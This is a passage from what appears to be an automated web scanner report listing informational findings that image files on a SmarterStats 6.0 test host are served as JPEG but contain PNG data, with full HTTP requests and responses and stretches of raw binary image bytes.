&K'..[.W.J...    ...zK2.g.|._W..[e..<....{.....`....i `t...4Id...A..;=.w..G.A..4K..M.C......EX.t].I.......f......6;..9....h....F......`.,....,.8.....cqg
{:...;..A..@@.. .4:0h...@).....4..f.v....sSr>......F    @.it`.,...2..g-.BM.6..6W...=..A..@@.. .4:0h....Y.Ik...kr(.....m....un.s8....... ...%.....A.@..@..@..@.D..s..@..@..@..4N..M.............................h....................6.............8..6...... .. .. ...l.. .. .. .. .q..l.. 4..@..@..@................IEND.B`.

10.49. http://vulnerable.smarterstats.6.0.host:9999/Temp/c77c8b574b60474b8ac78495f6f074dc.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/c77c8b574b60474b8ac78495f6f074dc.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/c77c8b574b60474b8ac78495f6f074dc.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB92FEF80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG

10.50. http://vulnerable.smarterstats.6.0.host:9999/Temp/cc02654a98df41d6bd5a3edd66c42234.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/cc02654a98df41d6bd5a3edd66c42234.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/cc02654a98df41d6bd5a3edd66c42234.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG

10.51. http://vulnerable.smarterstats.6.0.host:9999/Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG

10.52. http://vulnerable.smarterstats.6.0.host:9999/Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 8986
Connection: Close

.PNG

10.53. http://vulnerable.smarterstats.6.0.host:9999/Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG

10.54. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG

10.55. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG

10.56. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0463b7c1a16472f90db2c0647d531bf.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f0463b7c1a16472f90db2c0647d531bf.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f0463b7c1a16472f90db2c0647d531bf.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG

10.57. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0b1d954de574491a98b97217656a58a.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f0b1d954de574491a98b97217656a58a.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f0b1d954de574491a98b97217656a58a.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB92FEF80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG

10.58. http://vulnerable.smarterstats.6.0.host:9999/Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 18520
Connection: Close

.PNG
.'B.=\QO.v$...}k7x...-..CcE...j>.(..C.........J    ....3.. ..%H....... .....H...n8x..>=..M..vj..4.k.$...K..6j.5.._,..S...0.3P9S..[.aqt..=.. ..%H....... ..V......`.<lz..E.h......*C.R.    ;.E.qbO.L..p.(..@@.. ..?Fh...xp!.NM~SJ....h.nZ....~.T./>?.M,.vX.    .    ...\t..VK$[^.t...Dt..O..M.c...0...l|..O....2#.S..N.eH.rh}......$j.".o"..Vr.>..q(.jL.E..p.....k. ..f.AB.}...Gb)k.....K..loh....%U.*.J....Q..`..}[p.:F..y...`...L............@..`..D.%p.@.eK.6>...-7.1EN.D]-..A.Ts.Nj.zB..l....-.6.v..-.../"z... ..f.AB.}....It9...c.xI.......^z....A.F.Q.)....q.q..... .|.;.=....l.3....    .
6>...vgy#Z6.#...Ge......Q.<m..F.........&..Q..-.|..d.....l.3....    .
._........4u.'T..Lb.[u.}.?-....$....g.v.<..6.7..C.A.w.@...X.'.$ #.h]C.eQ.....hL..t.O.-.}.!..`N2.;Ay7.-......../h.o..`...Do.F@V...F".....E.h...h..6.c@.%.L;.IiW..v.. .[. .|k<=...h.h..M*nC.......w...tpH~...r.....6..j.+m......    6!..7..`.dUm.0.-.;._h...iL....Ao.Z....G.....0...6#......(s.x..<.'..K.....d=.{.R.M.._.7.Y1..U.....v.....+M.[...........J....M..i#.u9q.(......`3....aG...3...?..x.,.).6.z.l.....+h_.O^1...<.X.gNM.i-..Dh}..`.....y...-M{G..m..{
.)E.N5(..#>....(..;.....v~..#..@..@.d    @..,.=...&...c......%O..Y..+u..;......H.z...>Joy.^....lPkS...eD}D.......J.y.........1.......o.....B............._.:..-..{...T..{z...B.A..@....6L....a+.....Y....e.....).9...........o.z.,.Z{.^.b.........~_...........`...PT.m.@9...M./.Z..^.mJ7...}...6../
.z.&.nl.&.hD.'..].[PJ....Ai.....g..snn.4...........G.Ms..f..oS...l..7..{.....aB..-...t.....J[C.3.r|.......lf.......7i...-..'..X.&..B...]R..{W...;...hu.2...V.{......    .....x.......h.n    6;.5...)..?>......\^R.y{.x....7.
6%....>k?.oIy..h..........w(.X#
<.T......cJ...]...S....
....n,C7.l....y .. ....l......*.
6....9Z>U.@...Y-...j.n/.M......:...I..F.6...j@..o....J+'.....
M>.L.&.hJ.....].Sf...-.Y....@O......Rf.0=.;... ..N..`s...opY.17.]..c..y....-..io.S..eG.N.kL...Oh.X.c/.#S<l.....ET......#K!......h...N...5h..........BY....=......    ..?0........
..6_.I....RF..............P.........MMo...IiD..-M'.u.".f....k..-)...........M....i. 22.~..').(.. .....f...0.C..LOV.t.e.(6.l.`8..U..N.Op.`..h...4-....mz....9....B;..#..\J....vtcY.8..3g..e.h...0....?...._.o.....A...7...00.....N.X.s.,*......!...Vty...7-n.....<MOo....E._W.s=z...-[RL.2B.}Th.........(&&.......A`` ......t}..`..x.5&$pi.(.....mCS.uK']...:tr......%..CA..Q.......f....t.gw:..W....1}..=zr.s..Mo&.....Aaaa..~....a;v.X,...;]....6.pE. M@&...}..YX.]........)....0.......g.......V.lBY.{.b...C;....+].Xb../??Q....b......`..VM...9R.;
......`...R .1..oe..qo....-..%v..=\............o....hfFG.....4lh.:..g6-.z.:....k..X..Rt/o...q...-[ . ....
..7    @.y.6...v.pj._..;.m[:.m......Nt#.*...O%.m...4.D;.u.#......i..t..^t...mZ.......B.}\....L.....^||<-_...MB..y.v...x,q...hC..M......"plji....*;E[....{.....2g.R.i..._....fet.....!..jL.....e.%......+._..D..........c.`...6...m.h..)R.Q..@@....:#......^..n.+.X..oB...../[...Kj....S.Hp...4.>..f...u......}@.}...c.......in.W......c..c.........0..j....7./1.........6.Q...E..#..5Se........{x..l.@..K+.E...g
I.M!.]K..Nt..'.../.S.._..=......    ......+-...^..;v@..)....h..%n.....@.%..6.......3E...I.4.[1..h._h.....2.r...f~\..gQ.Z..!e....65mJ....b..M;...t...U..^6.^F.I..a..v.......6. ....Z@.m.r'.."..[.{..#..[...S...i............[.............(%..=...M.....l.K...%........@F.-\....:$A.E@..d.@..PB.........Z..*ql....O.....R..7.oZ..w(.`[!.>...:...N.M.}{P..lj.QE..mjNOr?.i.....c{]j.-ql.k....`....,).(.. .N..M..J..W..IO...W....;...3....ntyaU....E...i......C.6...4._]..8P.B..K.Ow.b.s../.-zx...XN.8....C...0..d....S....R.Q..@@....:#.....x...J..[u....../....Vt*.m.%6.|7.....5....k....}....|...e..Ka..+.B.8.3;...3...2::...[.,..^e s....?.x.B.7
......`Sg.. .5.i3..............6....tcIm...w.%..47."......v..u.Z....I9..K..O>...e.X.....kN.....K.$QQQt..aX1.,`.6. ...4C!.p....S.P..<K.....    )..eS..
.fm?...3.J........Ja;[..sB......O..k..!.dm.H.....!z.K...K.J.....QPP.......j.m....t.R..,...LF...d........7.P....Tmj#.Z?.9....4P.i[G.7.G....=i~.......P.qe(..o..........X..j.....c..../[Q/#o.P.l....^J\ .....`..%j..M.....{.?t.e{...Hp..Hp..Z3./...5-.....~.3....m...........N..4.b.....Y..8......#G`V.d6....Snn.&..*....'......:#p+me.x.........,.../..$.-E..>..Y}o..5..CjQ..aN..J.........U.|.)..#..K\.!.L..lE......{.*..c...$C..p......P...A...O.....E\]E.=Y)b.f.E{F....o........i...B...E..4..<.    u.P.2..M..~....2.f.zG...R. .7.Y.7.a....=z.`..xyXm9.g.JM/....    @.9..7...    d-.gg....L.#............"......8....cVy....].>.i;)..ZPE..~m...^..z.H}..=D.)b..../.d6..H*.?.    .$..f.qG.uN.ZN2....S..zE.Y....M(.|......oh..8r.K.......;D.....U....R3`..y.u.V.../..r({.......SR|Q..@@....<+......r~}..\..`c.67.'-..`8.;..u.X.2...K~~.Y.H....
....i.|..t.[RR......5...Mm9...&L.@?...W..<...@......>....s;...W.A./.N;....|m8.4.............Mi......Pi..B..8.../RHH..?~..&.0.w..W....... ..g..A@3.=B......^6>nj.....    .:.7~.....nYT.Jtv];!..u...cc...E....T=l...T..... .=..6...F......(..R....l.9............~C.r@.[6.\..}..!..;eG7W..W6I..{....M-.d.Cy.400..../...@...#..../.....x..)}2.......e...A......G..E.Z.%.X.e..
...C.o.p...4...C.....ff....P....N(.....`s..n.......M8.....B19.tk.wv...+..q......(..{.,..i.'...._^j.322.....4S..U....d..-.......`..W.
...p......b/~.K.:7..M)K...........{......6.%K...=.@u.x.#.c3.`....v...S.N...o..D......@...w..W    l>...-...,:.d].....^..;..]}
...r'N..6w.@.GU.bm.Kvts%.8.Y.f....M).d6.`w.W...0...`3.....# ...7 .`[vq.n,xo.....N....n..R.6.g?.q...lA....&BBB..Z..N.8a*..s2.5$...F(..n..`s..n........y.f..$....,&{8u..>......].ZYD.
...1=..p..f}.t........U....;h...8..{_.x.I    @..t..mc..[........E..1.........P....+~..4>.....B..u.....~....d....<y..b..@.....K.6lPe.. .....`s........v."..[....R.g.x...4.......G.Q.q..U....e.M.a....?.w.R...{y........%>'..&.......
..&. .4..J@.{....D...O?`/[.....r@.....1.<...@W.M.....H...........f.}<Pj.8.m..5t..i.7^............. .y..l.g.'....8.G.E....g.6_..[uI.6/...v4aD=..>]s.#Rz..]Ql6....:...n.#5>...x.b..k,He.k......I.C!.....@....w.@...t3.>._Ujit.....3.V_..5[.6.zN,G.S..jP.....=m._S..In....().u.86>r...}....Z...x(....`SE.. .O..;&...j..l.e.v......5..{.z.HI..............B.Mv...c.2e..}JOO.Y..........{...]..l.;...............R.m....wy..m..N.0.6].9.c....ty........\r..86...Ib}U....E.....{.$....aA.@@........j4......i...B._    ..->=.zLz.r......=b....)=.........#[.H.....9s.|.x.7%%Ej...kR...@@S..l..De .}..2....9/[.h.J.B.y.>.[...z.5!.<egEJ..U.
..tM...'.8.?J.%..........Rb.5...B .9..6...B..>.y[...uN...]i..)...m=h...t-$..vh. .m...kA....K..{.....9?t..Oy.8..L....IM.......`..VT
..%..l.c;........MI.q.3Z.;U.[.5........t}...ZR...~PUzv+X3.......'5h....u.V..l..'...S...
..G.@.y.+*.....r+...@~.....h[ r...:.m........n...q[..5..........8.....Vj....O,\..=..&...g.N.    ....\ ...'...}.x".hN...}....?...D........_...3\..b...c....p.Xt.j.....k.5..7.H..q..."]./.6..k.......Q... P2. .J.;.
...8tn...v'.1....../..TR].....}(.Z...:{".......@y..y.B.+M...#.n.hj.....7N./F.m....B..5Ne2O./.....#..Vr..d.p.@...h.....O...+1m%.[*.4jY..xm.9c..4...](o...Xnh(..W......e.i.T.[bb.a.[FF..&....g..z8........[. .....A.....2..o.l....Ch....l.O[pF{e...k.Um~...;.C.[..k..<[.....w.4.+.{..=.....ql.qk.}....].vIqA!......`..[....!..4^..zl.j.J....w.........ci.......t.>....5...-........W.bm...0w..Y.wU.\..M.".off......R..,...*5.P...B...+...]...C.u.Tn...7.R1...=..i...,.....h.k.S....W.KW.d.T.E......i..96m...4..-....UK...6...bm.Gl......r....../-.;w.0.qw21k\..j.+...GR<P..@... .<......+..@.I.9u.......%O.P..1.....+..I...5].{....hsvy.r*...m..Vh.....'..../...j.../.D......LjH../..;.|..g.a...=%.....\...O@... ....l.....$..*....R.w.\.,...\...9.....,.&.7.g.N..m.m........bW..l....U.B.@.][...r.s.8...$.....acO.3bm.......@@?. ..3.h..    .*.
<j.....P=.$..+.B.F..f....G.~W....,....G.....k;..Q...%KJ.BJ.K..&.y.Y..{(6\.Y.7)../^.9.T...,].{...k.7o...'..k..8.....w.@.y.3..G.21l..:.`c.6.DA.<.$..m..o...E......>..N....A:<..u.[J..zS...m..g.........Q..c{...q>6.xp..y]...sF..i..g.....(y...T\ ... ....q@+J..;.6.f.........^.l5..nY......f...x...k..0...c.j...K.....l..t...n
/........c).....^.G...Zt..&)........b.x.5.......+V.8*...B .Y..l.....L.U..J....M......q../jL.lQ.m.VT..~.(.M.B....r'O..`.;`...WCl6X.Q.p..e....B.c[.fegg.....9.dp..).....RS..@.c. .<............./w.^...+.D=...]'.}N.WV...6".:}<.]:..U..f.oY.{.uq....K=j.?.N.&6.b-..v..D.....n._c/......AY.-..H.Sh..}.6.H.f.
....@.y.-j.;....".jE.c..M>..^..=.H.kcqV|.........M.f.q..8.n.#.n.[..[...._.......%..N..=P...~.I.c../=XZZ.t.5K>6^....S.+.HU....x....G..r.0...k.;..Jxy.i..J4b@9U.VD.}.%].5.n-_....T.n........vlkm.8.Y..|.SI
6..9s..E.qZ..l.\X"u.....v. ..c..@...x.t..!.ydU...*u.....Pk.f...>...N.B.......... .[9.....^..#....6n.......S".;TSSS....".,..K........`3.... .i../....e(.U%..k..[f..ti.h%..-..q......j <kK.b./M.ql..0sR.E.<...l.......5..o/..%..v...........@...S.....R#(Q...K4.E@..s..@.&...C.G..........n,....E......H..z....?.b.U.bm..,q..........c.+R.xS.....c...j....g...o,.*bmx...hy.0\..pE...i.l.s...I......V.......aWv.@+j....-4.n,..z......<...-Rc8.]"........+.f..*....R.9....#^.m.........%"w..1k2.<.DjW..Qx.......x.....|x.Ko.E....XyK.......B.....L...{..........
Z{
........e.A......^......,...V..u.....5.n.....)g.`."<i7D./......B[..3%.......+..N.e%7....R.,ql|\...=x'N.pI.qR...p..s.T\)..%R.<E.Wa...(SD.+K........;...+.J..)uX.g......,....P.+.    ..+..{tG..MwC....~    .x.......V.D.....P....s..vq.P%9ot....i..k...."&.v.=...g....+].IN#.~8V.R7....^........K.1N.{.......75s.L:y..T_.-.K.|..H....q\ _....`..l...x..
...Y.t....`..W..U}.`c...2G.;.Kg....    .....l>2....x....m...ZX."m.K..Z....V\...y......S.[.....=.>D.-?9.6...'...
3.@+....()..Rql....)bG...5.U..!.4.....r.1c..O)p...H..\*...P ..y..
6;.9%...k.tjO.z.....G..Mc....a..x.:..>..U.@...v.ys.........
,{.....\..t....S..KZx.8......Q.Gf...(.=zd..d....`.|h.;V\x...tY.Y.."mt..f}....|..|.    @.........R.).km..Q....6h..p;..1E.~.D.[....ql..211.-..qj|Z....]..q...q.Dl..Y'.p....].E.X..3W..l}Nx..,.".....G..........K.7'.........5k...M..o.B...Y.D...#.....R.i.c.|.29k.....g..            .....z.s....X.,..M$.P.|..LG.6....N..3Y........`..v..._^E,...^M:...    FT.. `M.2...;?w...(.9!.reJ..+.I......5h......#...c{]jp-qlW.\!Y;w...?~.eo..`...Qv.r.\ ...G......=...'.Y..<'..-.=.......n.H....V-.d.K.U.C..............i).......P..7......R+.U.]....7......l......`3.... .i.O.>..5j.....x..q......y.}Z*...Q...l.6].a...X.D....jtx._...yR...3O9.Yq..oD....\..eO.....^..".    .N... ... .|{|.;..:..|.C$...X......s.....S<p.qa..q|$..w.....=..8.Z...tbKi:...iK.o....tf.W..Q.Lw...+E.sss.Sr........]||<.7.^5.aA!..    ..l>1..........)..$.......E.......Vo)...&9.....(sG.];TAIp+c...r....J]l;..Q....f...k.....r-h?//O    .w5....m...J.......9\ ...!..f..FOA...8V-.Y3.<....l..W6.T.S.;..."......C.    5.....r3.....>..i{. .].vi..."..."##)88....4m/*...0...6c..Z    .. ._....8RH/........m......4.l..m....+qj,...@..B. `L..l..7...tI.7...Uz...*.?...Z.8...,..7.}n.j|...w.P....A .[..l...4...E.7......}hss....h<..M..u."..._.x.,BM........ ......^.@..(.{...T..o.6~.3ql.M.e...@.7o..Q... ...    @.aN....M@-....p..........Xx......s..X.B.......$......Y `@..l..44Y...X...?Q.b.x......tJ...".<[.....J...DR.w.....L.5....m%!.X....Z..'m..e....x...x..tyXq#.........D..%~d..l9.8...?u...V....^.b......l..^........3...'..qQ...7 p.[........&.o.....>B...G....A...b.c%..x.,^0.\..\..n.v(.....Vbv..P.q...hUg....6[..C.-..a{..Jk.....
..N.......kN6.f...l...E..5.5.....I....&..f.........X.D...E,)..".....o..,B.....|...v..?..V(..KW.^...i......wnZ.1..u.8I...o...J.......@..l@..    ..a+"..x...2.....N...........K.\V........MO\.3.x.l......f...[6.B...^..#.p.ql.@..@... ..<zh.c.6.D...+qeV....-.n)..
=tN..r...kQ..].VDP..l.7T..l...........k;.hb{.5.........@.9...E....".H..f.....SN....+.a..9{...<lVr.a...;.a.....r.6..[....(:W.B{.....U+.........@...A......V.B........aSb.l...kS.o....P.@....T...
k......_WC..B.i..5...H..`.F...# .....Q.i.7+.....%...`6.w.@........+.........V..-X.t.K.Q...o..u..........%#....Q.?._h.W...niAQ...X.yl......q..\K}/=||a.J.+.].(..5...@..<E...SdQ.).....9T.|.
...3.4/w.......g..*+..E...i.tWi.K..b+|Gn~.
